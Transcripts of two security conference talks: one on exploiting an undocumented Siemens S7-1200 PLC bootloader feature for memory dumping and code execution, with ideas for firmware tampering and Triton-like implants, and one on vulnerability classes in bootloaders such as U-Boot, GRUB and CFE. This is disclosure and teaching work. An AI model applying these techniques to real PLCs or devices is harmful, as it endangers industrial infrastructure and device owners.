Just again, make sure that the PLC is functional. So also enter the password. I guess everybody can guess it. And then so you see that we log in eventually and in the left side you see all the functionalities which loads related to the PLC. So it's a working, running functional PLC. And so now you are going to decompress the framework downloaded from Siemens website after checking for export license and stuff. So they want to make sure that people from Iran and North Korea don't get it. I'm from Iran, by the way. So here we have the unpacked framework, but because the framework is very large, as Toby has mentioned earlier, what we are going to do is that we are just going to export 256 kilowatt of the framework from some part of the web server and in the IDA. So we have to set the big NDNS for the CPU and also rebase the framework. So as you can see here, there is no function yet, but once you rebase it, you have all the functions as well. And yeah, so then we just go and export 256 kilowatt from the framework. So we specifically slow down the UART because we want to make sure that we don't do it too fast to overflow the buffer which we have internally in the PLC. So here, for example, in this address, 691E28, we are going to export 256 kilowatt. This is from the framework, Siemens framework, right? So we just export it. So yeah, so it's now called FW0X691E28 in the folder out. So now we are done with this part. We are going to dump the same address in the PLC, so from running PLC. I have to mention again, so this is the top part is basically raw UART and this is basically our client part. And we are dumping it. We are cold boot style attack. So we are basically resetting the PLC and before it overwrite the RAM, we are basically dumping the contents of the RAM. So this is the address, 691E. This was the same address, basically. And we are dumping 256 kilowatt. And here we send MFGT1 basically and then got the dash CPU and then the rest of the stage and stuff goes. And now basically we are sending packet and then eventually get received. So basically got all the payload dumped in memdump691E28 basically. So this is from the RAM of the PLC. This is not anymore from Siemens websites. We are just SCP to our own machine and then compare it. So now we have the memdump and original frame where 256 kilowatt each and then we are going to compare them with each other. And as you can see, should look here. Like you have like 100% match meaning that it's exactly the same frame where which is available in Siemens websites. We dumped it directly from the Siemens PLC memory using this special access feature. So let's do another one. So this time we want to show that unconstrained code execution in just a very basic way. So we are actually just writing a custom payload to the PLC and get a hello or greetings from the PLC. So basically we just ask the PLC to send us this message all the time. So again, so we are sending our custom payload right here. It's a hello loop and basically the PLC just sending this loop for us. So all of these things again are for bootloader 421. We have to readjust certain things because Siemens, I think they updated again the bootloader in the recent 2019 December which we bought new PLC again, once again. And now here we get a response that the PLC is sending basically to us. These are raw data which PLC keeps sending to us that's showing that we are receiving this. But maybe this was too basic. Again, these are the raw data which we are getting from the PLC. 
Let's actually do something a little more complex and show something that is not from us. So we have a game called Tic-Tac-Toe inside the PLC. I guess if you don't know it, this is how Tic-Tac-Toe looks, like when I just play it on Google. So now we are again going to send our custom payload, but this time we are just using partial code from somebody else on the Internet, compiling it, and then uploading it to the PLC. Obviously you have to readjust lots of things there. So we are sending our payload, including the stager, and these are the raw data again, and this is our client. Eventually you will see the Tic-Tac-Toe interface, where you have to enter your moves. Player 1 is playing with X and player 2 is playing with O. So you see, with the positions you choose you get X, X, and hopefully player 1 wins. Yes. So that was it; that was the demo. Obviously there are lots of other ideas which we can work on for injecting other custom code using this special access functionality. We are still working on this, like lots of other things on Siemens. Sorry Siemens, we are just working on this. There is more to come, but in the meantime here are some ideas for other people, in case they are looking into this and want to investigate the security of Siemens PLCs. Using this special access entry you can do certain other things. For example, you can use the special access functionality to write to the firmware. As we mentioned, this functionality is available and it doesn't require the cryptographic signatures which are normally required during the firmware update process. You can just bypass that; it's only CRC checks. So what you can do, for example, is add an entry to one of the initialization routines which are available, or do it before another initialization routine, which we call internal TIH init. Another thing you can do, if you remember Tobias talked about some undocumented handlers and lots of creativity and creating music, is basically add a specific handler or overwrite an existing handler. And what that gives you is something like Triton. I don't know if anybody here knows about Triton; it's a malware which was attacking Petro Rabigh in Saudi Arabia. They were trying to do it over TCP, but an attacker here could maybe do it over HTTP, for example, and just listen and wait for commands. Another alternative is patching one of the jump tables in the AWP handlers, which can also be used for a process-specific attack. So what else is out there? We looked at the attack surface in the Siemens S7 PLCs from the perspective of local privilege attacks; what we looked at was the bootloader. We are still working on hardware attacks, and some hardware-software attacks on the edge are still ongoing work which we obviously don't discuss now. Another interesting thing, I think, for somebody who is interested in the security of PLCs and especially their internals: people usually talk about the general segregation of networks and stuff like that in ICS, but I'm talking about more advanced low-level stuff. We think MWSL is an interesting target; there are probably some bugs in its implementation. Also with respect to file system parsing and firmware signing there is probably some stuff, and also the MC7 code parser which they have, from a privilege escalation perspective.
And also, from a remote code execution perspective, both the MiniWeb web server and any network-accessible services which they have might be interesting. We are actually also looking at this part right now. So as a conclusion: PLCs are becoming more complex. That's true because they are actually providing more and more features, and because of this added complexity there will be more bugs; we can see that, for example, in the MWSL, which we are looking at now. Vendors are also making things more complex: they have some anti-debugging, which we discussed for the Siemens PLCs, but they also have, for example, firmware integrity verification, so signed firmware uploaded to the PLC and stuff like that. So they are making it more complex. But what we have to realize is this: in the threat model which lots of people build, or this security ecosystem which the vendor built, if there is a feature which undermines the very security ecosystem which they designed, I think it's obvious that they have to remove it. The special access feature in the bootloader is one good example of that. And of course customers also have to know, because if there is such a feature and the vendor needs it, that's fine as long as customers know about it. But when they don't, they can't account for this risk in their strategy or in the threat model which they have. They also have to rethink security by obscurity. Maybe they could allow us, for example as researchers, better and easier access to their devices to investigate them more. We are still doing it, it's just taking longer. And I believe that there is a lot more to be done on PLCs, and Siemens will not be the last one which we work on. So we have to thank some people: Thorsten Holz, our supervisor, who is not here, and Thomas, Alexander, Marina, Lucian, Nikita and Robin for their help with this work. And now we are going to answer questions. Thank you. So yeah, feel free to line up at the microphones or write your questions in the Elisa room. Ah, there you go. Hello. Yeah, so there's one question from the internet: did you check the MC7 parser? If yes, did you find any hidden, unknown MC7 instructions in it or something? So, you want to answer? It's fine. So just, is it recorded, or do I have to repeat it again? So they asked whether we checked the MC7 parser. Ah, okay. So we didn't truly investigate the MC7 parser yet, but we are working on it right now. Hello. How were you able to find the MFGT security password? Oh, that's a very long story. First of all, we had it in front of us for a long, long time, until Siemens introduced this anti-debugging feature. After that we had to find other ways, other means, similar functions, similar ways that would allow us in, because one thing we should mention here is that we didn't tell you how we, for example, executed instructions in the PLC before. It involved some work for which we received help from some researchers in the Netherlands and in France. This was something reported to Siemens in 2013, I think. They knew about it, but only in 2016 did they patch it, and then they basically tried to protect their PLCs from this kind of attack. It was never published before. So we were using it, and we don't want to talk about it because the original authors didn't want to talk about it, but we replicated what they were doing.
And then once we really had to look for other ways, like then it opened our eyes that there are some other functionalities as well there, such as for example bootloader. But before we needed it, like we never actually looked at this thing. So it was like in front of us for like two years. One interesting piece of a background story on this is that we actually in the previous technique that we used, we actually overwrote the conditional jump that would lead to this special access feature being executed with an unconditional jump. So we basically cut out 60% of the whole code of the firmware image by accident and then I just, because of the hunch that I was talking about before, that there is just too much functionality, I revisited it and actually realized that it was exactly the spot that we overwrote before and we had to basically replace it and use it for our own sake. Is there any boot time security other than the CRC check? So are you able to modify the contents of the spy flash and get arbitrary code execution that way as well? So it depends in which year you are talking about 2017, 2016. So we are talking about the same models of the PLC but in 2017 and 2018, no. So you could basically just take out the spy flash, overwrite it and that was fine. But if you were overwriting and it caused a halt in the CPU core, it would again trigger that anti debugging technology which they have with this watchdog basically. But from like frame very integrity verification, well basically once you write to the frame where it is written to the NAND flash, well it's just a CRC check sum. But during the update process, no, there are some cryptographic checks but once it's written, no. There are some problems there which again, it's a still ongoing work and we don't want to discuss about it but nice cat. Thank you. Hi, thanks for your talk. Could you elaborate on your communication with the vendor and the timeline? Yes. So first of all, we know about this problem for like one year and a half before we reported to the vendor and the primary reason was that we were using it for some other project. Actually this result is actually from a site project rather than the main project because the main project is still something else and it's still ongoing. But from the side of that project, we had that access and because we were worried that reporting to the vendor, they can't fix it with software update and then do not allow all other CVEs which we find from this other project. We didn't want to. Eventually at 2019, Thomas Weber wanted to talk about his talk on like basically this JTAG interface with full core site and then we decided to actually talk about it as well. But other than that, we actually talked in June, I think with Siemens and they confirmed that there is this hardware based special access feature and they say that they are going to remove it. And that was it. We also send them a write up for them to read. So there is one last question from the Signal Angel over there. Yeah. So there's another question from the Internet. If tools like Flash ROM doesn't have support for unknown SPI Flash ROM chip, then how do you usually extract firmware if you don't want to decap chip or use SOIC8 socket? Can you repeat it again? I didn't get the question. So first of all, we never actually decap the SPI flash. So that's just did it for the CPU. And just because we want, we know that Siemens re-labeled their PLC. So it's not their own CPU. It's from Renaissance. But that's why we did the decapping. 
So, setting the story of decapping aside: for the other things, there is still this bootloader functionality which actually lets you read the contents of the memory. So that's one thing, you can just read it. And actually you don't even need that, thanks to one of my students: we now know that you don't even need to take out the bootloader chip, we can basically just connect directly to the board and dump the firmware. Marcelo, that's his name; he's here, actually. Anyway, you can just read it directly. And yeah, for the reading part, some parts of it are protected, especially in the recent versions, so you can't read everything. But besides that, I don't think there is any hardware protection yet. I'm sure they are working on that, and we are also working on something to bypass it. Okay, that was all. The next talk is going to be about delivery robots, Sasha, in 20 minutes. So let's give them a hand. Thank you for attending. Thank you.
A deep dive investigation into Siemens S7 PLCs bootloader and ADONIS Operating System. Siemens is a leading provider of industrial automation components for critical infrastructures, and their S7 PLC series is one of the most widely used PLCs in the industry. In recent years, Siemens integrated various security measures into their PLCs. This includes, among others, firmware integrity verification at boot time using a separate bootloader code. This code is baked in a separated SPI flash, and its firmware is not accessible via Siemens' website. In this talk, we present our investigation of the code running in the Siemens S7-1200 PLC bootloader and its security implications. Specifically, we will demonstrate that this bootloader, which to the best of our knowledge was running at least on Siemens S7-1200 PLCs since 2013, contains an undocumented "special access feature". This special access feature can be activated when the user sends a specific command via UART within the first half-second of the PLC booting. The special access feature provides functionalities such as limited read and writes to memory at boot time via the UART interface. We discovered that a combination of those protocol features could be exploited to execute arbitrary code in the PLC and dump the entire PLC memory using a cold-boot style attack. With that, this feature can be used to violate the existing security ecosystem established by Siemens. On a positive note, once discovered by the asset owner, this feature can also be used for good, e.g., as a forensic interface for Siemens PLCs. The talk will be accompanied by the demo of our findings.
10.5446/53175 (DOI)
Okay, please welcome our next speakers, Joseph and Ilja, who will be talking about how bootloaders are broken and how to look into them. Please give them a warm round of applause. Hello, does this sound okay? Cool. Yeah, so welcome to Boot to Root, auditing bootloaders by example. I'm Joseph Tartaro. I hack things for IO Active and this is my second time at Congress, so I'm really excited to be back here. Hi, I'm Ilja. This is my 18 or 19 time at Congress. Happy to be back here too. I've spoken here, I think, seven or eight times before and I'm very excited to speak here together with Joe. We've been working together on bootloaders last year in change and this is minus the NDA coverage stuff. This is some of the things we've observed and seen, so I'm very excited to do this. Yeah, so the expected audience for this talk would be embedded systems engineers, security people who are interested in embedded systems and just curious security people. Just a caveat. We're going to be quickly going through about like 70 slides or so and a lot of it's just like examples of C source code, so if you did not realize you were signing up for an hour of that, feel free to walk out. We're not going to be offended. And then another caveat would be this isn't really trying to flex and show look at all the bugs we found. The purpose of this was to kind of show people, hey, if you have not looked at bootloaders before, this is our recommended areas of attack surface that are interesting. This is probably where you should get started. And in some examples of nobody's really looking at them and they should start, so that's pretty much what's going to go on right now. So quickly, here's the agenda. We'll discuss why they're important. Some of the common ones we looked at, attack surface and our conclusions. So there's going to be a wide interpretation of bootloader. So basically what we mean by that is anything that's in your secure boot chain. And if you don't have experience with these or you haven't looked at them much, you can kind of think of it like from an operating standpoint of user land calling into kernel space, you'll have kind of normal world calling into secure world and stuff. And that's kind of what you're looking for is those pivots and when they're processing, you know, attacker user control data. So why? Because they're, you know, critical for security. It's a key component of your chain of trust and it's very obvious that a lot of device designers are poor at hardening and limiting attack surface. And what we mean by that is a lot of the devices we've looked at over the last year or so, you'll find devices that have like full network stacks even though they don't need a network stack. You'll have a bunch of code loaded up to handle file systems that are never expected. So it just, it doesn't really make sense why they're not limiting all that attack surface. There's also a huge under estimate of reverse engineering. People just kind of assuming that there's no bad actors and nobody's really going to look at this thing and it's this hidden black box that we should ignore. And a little story behind the presentation is we're actually on a train going to a baseball game. I was trying to introduce Ilya to the lovely game of baseball. And we were talking about U-Boot and I pulled out my phone and we went to the U-Boot GitHub and in about, I don't know, 10 minutes, 15 minutes, we ran into like 10 bugs and we went, yeah, we should probably audit some of this stuff. 
And kind of as inspiration from a previous talk that Ilya has given at Congress, where he audited a bunch of different BSDs, I said, why don't we look at a bunch of different bootloaders. And just to give credit where credit's due, we are not the first to look at any of this stuff. So this is a list of people that kind of inspired us and have done really interesting work. And we recommend, if you're interested in any of this and you enjoyed it, you should go check these people out and see the things that they have released in papers and stuff like that. So where are they? Bootloaders are pretty much in everything. You have your workstations, game consoles, your TV, you know, everything. And generally the security basically depends on this. So it obviously really, really, really matters. And so with that said, we basically started looking at these common open source bootloaders: U-Boot, coreboot, GRUB, SeaBIOS, CFE, which is Broadcom's, iPXE and TianoCore. And we're just looking at what's on GitHub, what we downloaded. Obviously in your real-world scenarios, the devices that you have at home or go buy and start looking at, they're going to be heavily modified. They're going to have weird custom drivers that aren't available, things like that. So, you know, we're not here to argue the likelihood of some of the bugs we found. We're not going to argue exploitability. Half of them, we don't know if they're exploitable. We don't know. We will for one. Yeah, we will for one. That's not really the point of it. The point is to kind of show people, show designers what they should be concerned with, and show researchers that might be interested what they should look at. So U-Boot is extremely common. It's in a ton of devices. There's a huge, very customizable config for all different sorts of boards and stuff. There are concerns around environment variable stuff. There's a super powerful shell, so you'll sometimes even see shell injection concerns based on environment variables. It's pretty funky. And there are lots of drivers for tons of devices. So it's kind of a great first step, looking at something that covers a huge breadth of things. Features of U-Boot that are interesting would be, you know, the network stack for different protocol parsing, file systems, and they also will load their next stage images from all sorts of weird, archaic things that nobody uses anymore. And it's just used by tons of devices. And then coreboot. And I apologize, this is a little dry right now, we'll eventually get to the good stuff. But coreboot, you know, is more targeted towards modern operating systems. There isn't legacy BIOS support. They took a methodology that other projects don't, which is that they're not going to implement features that they don't want to. So if you're trying to do network booting or something, you use coreboot to boot into something like iPXE; they're not going to implement that feature themselves. These are used in Chromebooks, and obviously some of the interesting parts come from Google. And one main interesting area is SMM. And then GRUB. Obviously you guys are all familiar with this. The primary concern here is the Multiboot spec, and they support just a ton of file systems, so that's obviously the attack surface you'd be concerned with. But the interesting part here is that there are UEFI-signed versions of GRUB. So that's kind of like your secure boot break right there.
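Since the environment-variable pattern mentioned here comes up again and again in the examples later on, here is a distilled C illustration of the unsafe habit versus a bounded version. It is not the literal U-Boot source; env_get is stubbed out so the snippet stands alone.

#include <stdio.h>
#include <string.h>

/* Stand-in for the bootloader's env_get(): returns NULL or a NUL-terminated
 * string fully controlled by whoever programmed the flash. */
static const char *env_get(const char *name)
{
    (void)name;
    return "attacker-controlled-value";
}

static void unsafe_pattern(void)
{
    char hostname[128];
    const char *e = env_get("hostname");
    if (e)
        memcpy(hostname, e, strlen(e) + 1);   /* no bound: classic stack smash */
    (void)hostname;
}

static void bounded_pattern(void)
{
    char hostname[128];
    const char *e = env_get("hostname");
    if (e) {
        strncpy(hostname, e, sizeof hostname - 1);
        hostname[sizeof hostname - 1] = '\0'; /* always terminated, never past the end */
    }
    (void)hostname;
}

int main(void)
{
    unsafe_pattern();   /* harmless for this short test string, fatal for a long one */
    bounded_pattern();
    return 0;
}

The safer variant is nothing exotic; the recurring problem in the examples that follow is simply that the bound is missing.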
If you find a vulnerability in a signed version, you can now load that into your UEFI, exploit that vulnerability, and you're good to go. And then SeaBIOS is the default BIOS for QEMU/KVM. This supports legacy BIOS stuff, so you'll see that this gets booted into from things like coreboot. It supports TPM communication, so that's kind of interesting. And it's the Compatibility Support Module for UEFI and OVMF. And then Broadcom CFE. This is used in a ton of different network devices and TVs and stuff like that. And the obvious attack surface there would be network protocols, the network stack. That's what you'd want to look at. iPXE: this would be more network-based stuff, various parsing, and similar to GRUB, there are UEFI-signed versions, so it's a great potential pivot for secure boot stuff. And then finally, TianoCore. There's really no introduction needed here. There have been a ton of great presentations over the last 15 years, people just doing everything to this thing. And due to that, since it's pretty much the most scrutinized one out there, it's really mature compared to everything else. So when you bash TianoCore, realize that it's way better than everything else. There are a lot of implementations built on top of it, like platform-specific stuff, Qualcomm ABL and XBL, things like that. So you'll have all these: you have the base TianoCore EDK2 and then you have all the custom stuff built on top. And then related to bootloaders, you have things like TrustZone. And that's kind of what I mentioned: you have normal world and secure world. You'll have these interesting pieces of code that call into those secure areas that you're going to want to look for, you know, pivots into there so you can gain access to secrets. And then obviously from the host operating system, the attack surface there would be that you can modify things like NVRAM. So you can set variables that, the next time you reboot, the bootloader is going to process. And this slide is more for reference; later you can get the slides or take a picture or something. These are just links to some instructions for building and whatnot. So if you wanted to start looking at these, you can quickly build a little environment and poke around. So just really quickly to go through the concept of secure boot: you kind of have your chain of trust. You'll have the boot ROM that will then verify and load various other loaders, which then verify and load the next thing. And you'll sometimes have TPM involvement, you'll have some TrustZone involvement, and then OS interaction stuff, like the OS basically setting things like NVRAM which will set boot configuration stuff and whatnot. So the boot ROM itself, you've probably seen the talk by qwertyoruiop, I think, earlier. It's really important because it can't be patched; a hardware revision would be required if a vulnerability is found. And it's so early in the chain, and you would basically compromise everything after it, that this is where you'd want to go. It's extremely bare minimum. It does some initialization of hardware and memory stuff, and then you'll find things like maybe implementations of fastboot, you have a USB stack, so that's an obvious attack surface you'd be interested in. And then it will verify the signature of the next stage and boot that. And then you move on to the next stages. And this is where they start initializing the rest of what's necessary: network stacks, SMM handlers and whatnot.
And they'll basically just keep handing off. And then you'll run into things like trusted boot and measure boot which is, you know, verification and then measuring which is kind of more for logging and whatnot doesn't actually mitigate anything. It just kind of alerts you of stuff. So some hardware environments are a little different. Like the secure world stuff, you'll have ARM or trust zone. Windows has VTL 0, VTL 1, hypervisor stuff. And then, yeah, I'm basically repeating myself. And then eventually the operating system, that's going to get the kernels going to be loaded, it's going to be verified. And then eventually start running and then you can have fun. So early observations is everything we pretty much looked at that's open source, there's no privilege separation. So if you were to compromise a piece of component, you pretty much rule everything. And what's interesting is there are some proprietary boot loaders that you're starting to see, like Apple, for example, they're doing some aspect of privilege separation. So if you were to exploit a portion, you didn't necessarily control the world. And so right now, at least all the stuff we looked at did not have anything like that. But maybe in the future, we'll see that. So this is the list of the attack surface that we think people should be interested in and focusing on. You have NVRAM, file systems and files, all network stack protocol stuff, all various buses, you know, SMM, DMA and hardware stuff. The interesting thing about buses that we've noticed is that embedded designers seem to inherently trust anything that end users should never interact with. So they go, okay, an end user uses USB, so we should verify some of that, but they do a bad job. But an end user doesn't play with the spy flash, so just inherently trust it. Or an end user isn't to the TPM. So just if the TPM says something, run with it and they mess it up a lot. So NVRAM, these are the various environment variables that can be configured, you know, for the next boot cycle. And like I said, it's basically processing of user controlled data. So if you start looking at some of these boot loaders, here's the interesting functions you'd want to look at. For example, in Uboot, you just kind of call for environment get and grab through and you see them grabbing the environment variable and see what they do with it. If they're not doing any sort of validation, you're going to hit a book. And so an example of that would be right here, you see there's an environment get for boot P VCI. It checks if it existed. It will then do a stir length and then just mem copy it directly into a buffer without validating that it can fit the buffer. And this is actually kind of funny earlier today. We were like, ah, we should try to exploit one of these just to show it. So we toyed with this one and, you know, just do a bunch of bytes and it starts just kind of sending these weird packets over the wire and a bunch of boot P stuff. You'll see later on you just have full raw packets of whatever payload we send. But it wasn't very realistic. It kind of went, started getting into like the key move like network implementation stuff. So we kind of avoided and moved on to a different bug. But as you can see, it's very easy for you to start looking at the stuff and being interested in it and quickly set up an environment and mess with exploitation and we'll get into it but there's no mitigations. So as you see, there's a bit of a pattern here. Environment get host name, mem copy with stir length. 
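As a compact way to remember the verified versus measured distinction just described, here is a hedged sketch of one hop in such a chain. sha256(), sig_ok() and tpm_extend_pcr() are stand-ins for whatever ROM or TPM services a real platform provides, and the PCR number is arbitrary.

#include <stdint.h>
#include <stddef.h>

typedef void (*entry_fn)(void);

/* Stand-ins, not a real API: assume the platform provides these. */
void sha256(const void *data, size_t len, uint8_t out[32]);
int  sig_ok(const uint8_t digest[32], const uint8_t *sig, const uint8_t *pubkey);
void tpm_extend_pcr(int pcr, const uint8_t digest[32]);
void panic(const char *why);

void boot_next_stage(const uint8_t *image, size_t len,
                     const uint8_t *sig, const uint8_t *pubkey)
{
    uint8_t digest[32];
    sha256(image, len, digest);

    /* Measured boot: record what is about to run, whatever it is. */
    tpm_extend_pcr(4, digest);

    /* Verified ("trusted") boot: refuse to run anything that is not signed
     * by the key this stage trusts. */
    if (!sig_ok(digest, sig, pubkey))
        panic("next stage failed signature verification");

    ((entry_fn)(uintptr_t)image)();   /* hand off control to the next stage */
}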
No checks. A 128-byte buffer, env_get of the boot device variable, strcpy. It just keeps happening. This is kind of what we were talking about: the code quality is just not very great. What's funny is, when we were messing with that BOOTP VCI stuff earlier this morning, we went, oh, this is going to be more involved. So it was like, well, let me just go find a different bug. You know, 10 minutes later it's like, oh, I found a different stack smash, okay, let's work on that one. This is a perfect example: they env_get the variable and then they'll grab the very first element of that variable as a length and then use that as a length. And it keeps happening. So just a quick example. See this. The attack scenario of this would be: you have a device, you have NVRAM that you can physically modify because you have physical access. And this is kind of an example of the default NVRAM. So we just threw in an environment variable with 600 bytes, and you'll see towards the bottom there are four bytes where we threw a function address in there. This had to do with the JFFS2 file system loading. So you just do fsload. And that's it. That's shellcode being executed. So this is... Sorry, I can't see. So obviously, if you've never looked at this stuff, it's kind of fun to play around with and you should start poking at it, because why not? And screenshot. Cool. So that was the NVRAM attack surface, which is usually the most fun to play with. Programming the SPI flash sometimes may take a little bit of fiddling, but in terms of attack surface and fun things to play with, it's, you know, as Joe said, often overlooked and so it's easy to toy with. And you saw all these env_gets and memcpys and strcpys, so there's a lot of fun there. But obviously there's not just NVRAM. There's more attack surface to a trusted boot environment. And obviously one of them is the file system, right? Because this thing needs to boot, and it needs to find images, and they're stored somewhere, and your file system sort of brings order to that chaos. So basically you need to mount your file system, and often file systems are not signed or integrity checked, or not all of it is, because before you can do that you need to be able to read something. An obvious example of a common file system would be FAT: if your boot environment supports loading from a USB drive for storage, it's probably going to be FAT. And depending on the device, the flash itself may have its own proprietary format, or it may use ext2 or something else. But clearly the file system parsers, I mean, that's prime attack surface. Closely related are obviously the files inside of your file system, right? Now, depending on what your boot environment looks like, some of these files are going to be integrity checked, but some of them might not be, right? And so those file parsers are interesting attack surface. And if you're either looking for bugs or you're building a product, we would highly recommend fuzzing these, and starting with AFL is probably a good starting point. But we'll show some examples of some bugs we saw in a number of bootloaders. We'll cover ext2, we'll cover a bitmap splash screen parsing one, and then the other ones are sort of examples of where there could be bugs, but those two we'll cover.
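For anyone who wants to try the NVRAM angle themselves: the raw, non-redundant U-Boot environment image is simply a CRC32 followed by NUL-separated key=value strings and a final empty string, and the sketch below packs one. The variable names, the 0x2000 size and the little-endian CRC placement are assumptions that have to match the target board's configuration.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ENV_SIZE 0x2000u   /* must match the board's configured env size */

static uint32_t crc32(const uint8_t *p, size_t n)
{
    uint32_t c = 0xFFFFFFFFu;
    while (n--) {
        c ^= *p++;
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ ((c & 1u) ? 0xEDB88320u : 0u);
    }
    return ~c;
}

int main(void)
{
    static uint8_t img[ENV_SIZE];          /* zero padding by default */
    uint8_t *data = img + 4;               /* data area starts after the CRC */
    size_t off = 0;

    const char *vars[] = {
        "bootdelay=3",
        "bootcmd=fsload; bootm",
        /* an oversized value, like the 600-byte one in the demo, would be
         * appended here as another "name=AAAA...<address bytes>" entry */
    };
    for (size_t i = 0; i < sizeof vars / sizeof vars[0]; i++) {
        size_t l = strlen(vars[i]) + 1;    /* keep the NUL separator */
        memcpy(data + off, vars[i], l);
        off += l;
    }
    data[off] = '\0';                      /* empty string ends the environment */

    uint32_t crc = crc32(data, ENV_SIZE - 4);
    memcpy(img, &crc, 4);                  /* host-endian; little-endian target assumed */

    fwrite(img, 1, sizeof img, stdout);    /* raw image, ready to program into flash */
    return 0;
}

The stored CRC has to be valid, otherwise U-Boot falls back to its built-in default environment instead of parsing your variables.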
So this is GRUB, and this is GRUB's ext2 code, the symlink code: it looks at the file system and it goes, oh, okay, this is a symlink, how do I parse the symlink? And the symlink says, hi, I'm a symlink, I'm this big. And what GRUB does is, oh, great, I'll allocate that much, but I'll add one more for a NUL byte. And of course that is a classic integer overflow. And the GRUB memory allocator actually returns a valid pointer for a zero size. So this is a perfect primitive: you get a pointer to something that is zero size, and then it actually reads the symlink content from the file system into a zero-size buffer, and obviously that's going to cause memory corruption. And the primitive, you can't see it here, but the primitive is really nice, because that particular read function actually stops reading if there's not much more on disk. So even though you can say, read four gigs, you can make the layout so it only reads, let's say, a thousand bytes or a hundred bytes. And so you have this near-perfect primitive to cause memory corruption. This one was in TianoCore, for example; this was the bitmap splash screen parser, and I don't know much about bitmap internals, it's a very simple format, but basically you can have a four-bit bitmap and that gives you a palette of four by four, which is 16 bytes. And so the idea is, if you have a four-bit bitmap, then it has a 16-byte palette, and so it goes and reads that 16-byte palette, except you tell it how big the palette is, and you can say, okay, I know you're expecting a 16-byte palette, but I'm giving you a 256-byte palette, and it will read it into a 16-byte buffer. So that was broken, and then for the 8-bit bitmaps it was similarly broken, the same way. And these are just the tip of the iceberg. There are many, many, many more. This did not take long to find. But let's move on. Obviously, now that we've looked at some local stuff and some physical stuff, what about remote? What is there? Obviously, if you're talking remote in the modern world, you're talking TCP/IP. So you need a TCP/IP stack, and you need to have some services that you either expose or that you have client code for that you go talk to. And that's BOOTP and DHCP and DNS and iSCSI and NFS. And if you're on a corporate net, you probably want to have IPsec, and then HTTP and HTTPS and TFTP. And sure enough, most bootloaders have code for this, and then you start asking, okay, what's the attack surface? For TCP/IP, if you implement your own stack, well, good luck, because you're going to screw it up. But secondly, if you look at these things and take a step back, really this is all mostly TLV parsing. And so you go and look into what are the things that can go wrong if you do TLV parsing, and there'll be out-of-bounds reads pretty much everywhere, and you'll see them in those loops and lots of places and things like that. If you look at the protocols on top of that, like DHCP and DNS, you have your standard network attacks where you'll see lease stealing or cache poisoning or things like that if you don't protect your IDs. So if you have a static ID, or you don't validate your IDs, or you generate predictable IDs, you can have these kinds of poisoning, stealing, man-in-the-middle attacks. And then thirdly, obviously, the thing we really like to see is memory corruption bugs. At the end of the day, you take network data and you parse it, and if you do it wrong, you may cause memory corruption bugs.
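The symlink bug boils down to a one-line arithmetic mistake, so here it is as a distilled pattern rather than the literal GRUB source; the 4096-byte cap in the checked version is an arbitrary sanity limit.

#include <stdint.h>
#include <stdlib.h>

/* "len" comes straight from attacker-controlled on-disk metadata. */
void *alloc_symlink_unsafe(uint32_t len)
{
    /* len == 0xFFFFFFFF makes len + 1 wrap to 0; a simple allocator happily
     * returns a valid pointer for a zero-byte request, and the follow-up
     * read of "len" bytes then writes far past the allocation. */
    return malloc(len + 1);
}

void *alloc_symlink_checked(uint32_t len)
{
    if (len > 4096)            /* reject absurd sizes before doing arithmetic */
        return NULL;
    return malloc((size_t)len + 1);
}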
Another sometimes overlooked, interesting kind of bug when you're doing network parsing is information leaks. This often manifests itself — Heartbleed, of course, was one example, it was a perfect primitive — but generally it will be this thing where you end up generating some kind of packet as a response to something, and you'll have done the memory allocation but for some reason not initialized something, and so you end up sending uninitialized data over the network. So these are the common things you see in network stacks in general. So if you are looking for these kinds of bugs in a boot environment, or if you are building a product that does this, I would highly recommend fuzzing them. There are numerous interesting network fuzzers. If you're looking for network stack fuzzing, I would recommend ISIC. It's pretty old but it's still incredibly, incredibly effective. It tends to break most network stacks. So with that said, let's show some examples. So U-Boot, for example: this is the U-Boot DNS code, and if you see that ID there, that's the DNS ID, and basically they use a static DNS ID of one for all DNS packets that they send out. So doing DNS man-in-the-middle on a U-Boot environment is extremely trivial: you guess the DNS ID by saying that it's one, and you are correct 100% of the time. So this is Broadcom's CFE and this is the DHCP parser, and it basically has this sort of junk stack buffer where it just needs to read something out of a buffer, and it goes and says, okay, well, get me the length of that thing, and it's a uint8. So that means it can represent 0 up to 255, and then it reads 0 up to 255 bytes into that junk buffer. So that's a stack corruption right there. If you then look further at the CFE DHCP parser, it's very similar, where in this case it has a 512-byte buffer and then it basically copies the entire RX buffer into it, and this is Ethernet, so up to 1500 bytes gets copied into this 512-byte buffer, again causing memory corruption. Obviously we're not done with CFE yet, because it has such beautiful code. So this is the CFE ICMP ping handler, and this has this really cute sort of use-after-free bug, or double free, where it basically sends out a ping and then it sits there receiving — you see the while loop there — it sits there receiving packets until it finds the right one, but because it doesn't want to hang in its loop, it also has a timeout. And there's this interesting condition where if the last thing it looked at was the packet you were looking for, but it also timed out at the exact same time, it frees that packet twice, which obviously can lead to memory corruption. Again, we're not done with CFE yet. Oh right, there we go. Not done with CFE yet, so this is the IP handling in CFE, and if anybody has ever looked at an IP header, which I would assume most of you have, you'll know it has an IP header length and a total length, and of course CFE needs to know this because it needs to know where stuff is, but CFE validates neither the IP header length nor the total length, so once you start messing with those, CFE blows up really fast. So that was a quick overview of all the trivial TCP/IP-related bugs that show up in your average boot loader. But let's say you got that covered, and let's say, okay, what's the next thing? What more network stuff can we do? And then of course what comes to mind is Wi-Fi, 802.11.
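A small sketch of the two CFE-style patterns above — the fixed DNS transaction ID and an option length taken straight off the wire; the names and sizes here are illustrative, not the vendor's code:

#include <stdint.h>
#include <string.h>

/* A static transaction ID means an off-path attacker spoofing the reply
 * guesses it correctly on the first try. */
#define DNS_QUERY_ID 1

/* The option length is a uint8 read from the packet, so 0..255, but the
 * scratch buffer is much smaller: a long option smashes the stack.       */
void parse_option(const uint8_t *opt)
{
    uint8_t scratch[16];
    uint8_t len = opt[1];

    memcpy(scratch, &opt[2], len);          /* BUG: len can exceed 16     */
}

void parse_option_checked(const uint8_t *opt)
{
    uint8_t scratch[16];
    uint8_t len = opt[1];

    if (len > sizeof(scratch))              /* reject oversized options   */
        return;
    memcpy(scratch, &opt[2], len);
}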
